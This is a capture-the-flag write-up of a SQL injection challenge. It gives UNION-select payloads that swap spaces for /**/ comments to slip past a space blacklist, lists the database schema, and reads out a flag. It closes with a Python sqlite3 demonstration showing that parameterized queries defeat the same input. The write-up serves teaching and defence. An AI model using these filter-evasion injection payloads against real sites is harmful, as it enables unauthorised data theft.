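Entering 11' directly returns a syntax error. Entering 1' and '1'='1 then returns "SQLi detected!", which shows that some protection is in place. Entering 1'and'1'='1 echoes back ID: 1'and'1'='1 name: baloteli, which shows that what is being filtered is the space character.
Following the usual approach, work through the database names, table names, column names, and then the flag, with each space replaced by the /**/ comment.
List the databases:
1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1
List the tables:
1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1
List the columns (the output shows that there is a flag column):
1'/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/'1'='1
Read the flag data:
1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1
The flag is flag{Y0u_@r3_5O_dAmn_90Od}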
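
Why the space filter fails and what closes the hole, as an added example that is not part of the original writeup. It uses Python's sqlite3 with an in-memory database in place of the challenge's MySQL backend; the users table, the filter logic, and the flag value are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in for the challenge database. Only the web1.flag
    name and the 'baloteli' row come from the page; the rest is assumed."""
    db = sqlite3.connect(":memory:")
    db.execute("ATTACH DATABASE ':memory:' AS web1")
    db.execute("CREATE TABLE users (id TEXT, name TEXT)")
    db.execute("INSERT INTO users VALUES ('1', 'baloteli')")
    db.execute("CREATE TABLE web1.flag (flag TEXT)")
    db.execute("INSERT INTO web1.flag VALUES ('flag{constructed-sample}')")
    return db

def lookup_blacklist(db, user_id):
    """Assumed shape of the challenge's defence: reject any input that
    contains a space, then concatenate the input into the SQL text."""
    if " " in user_id:
        return "SQLi detected!"
    sql = "SELECT name FROM users WHERE id = '" + user_id + "'"
    return sorted(row[0] for row in db.execute(sql))

def lookup_parameterized(db, user_id):
    """Hardened form: the input is bound as a value, so quotes and
    comments inside it are never parsed as SQL syntax."""
    rows = db.execute("SELECT name FROM users WHERE id = ?", (user_id,))
    return sorted(row[0] for row in rows)

# The last query string quoted on the page, unchanged.
PAGE_INPUT = "1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1"

if __name__ == "__main__":
    db = make_db()
    # The filter fires only when a literal space is present.
    print(lookup_blacklist(db, "1' and '1'='1"))
    # /**/ is whitespace to the SQL parser but not to the filter,
    # so a row from web1.flag comes back next to the user name.
    print(lookup_blacklist(db, PAGE_INPUT))
    # Bound as a parameter, the same string matches no id at all.
    print(lookup_parameterized(db, PAGE_INPUT))
    print(lookup_parameterized(db, "1"))
```

The blacklist inspects characters while the database parses tokens, and binding the value removes that mismatch instead of trying to enumerate every whitespace equivalent.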